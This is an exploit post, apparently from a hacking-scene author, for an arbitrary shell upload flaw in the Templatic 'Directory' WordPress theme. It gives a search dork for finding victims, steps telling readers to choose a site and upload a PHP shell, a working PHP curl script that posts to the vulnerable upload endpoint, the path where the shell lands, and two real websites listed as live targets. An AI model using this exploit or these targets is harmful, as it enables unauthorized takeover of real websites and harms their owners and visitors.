Wordpress Theme Directory Arbitrary Shell Upload Vulnerability - ste smart

#####################
# Exploit Title : Wordpress Theme Directory Arbitrary Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:/wp-content/themes/Directory/
# Vendor Homepage : https://templatic.com/
# version : 2.0.16 - 2.0.14 & maybe higher or lower
# Tested on: [ BackBox ]
# skype:xbadgirl21
# Date: 15/08/2016
# video Proof : https://youtu.be/eVjW6rnaoSY
#####################
# [+] USAGE :
#####################
# 1.- Download or Copy the Exploit C0des
# 2.- Use Dork and Choose One Of the Website 
# 3.- Edit The Script
# 4.- Upload Your File : shell.php.jpg or shell.php.txt
#####################
# [+] Exploit:
####################
<?php
$uploadfile="x21.PhP.Txt"; ///xBADGIRL21 ! Removing my name Doesn't mean you are the Founder or Owner of this ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?> 
#####################
# [+] Dev!l Path :
#####################
# http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt
#####################
# [+] Live Demo :
#####################
# http://guiagronicaragua.com/wp-content/themes/Directory/
# http://ilovehermanus.co.za/rv//wp-content/themes/Directory/
#####################
# Discovered by : xBADGIRL21 - Unkn0wN 
# Greetz : All Mauritanien Hackers - NoWhere
#######################
### Note ### : This Exploit Was Discovered By Someone I Know but He Doesn't Want Me to Write His Name
# so I Just Wrote the Exploit C0des ...........
#####################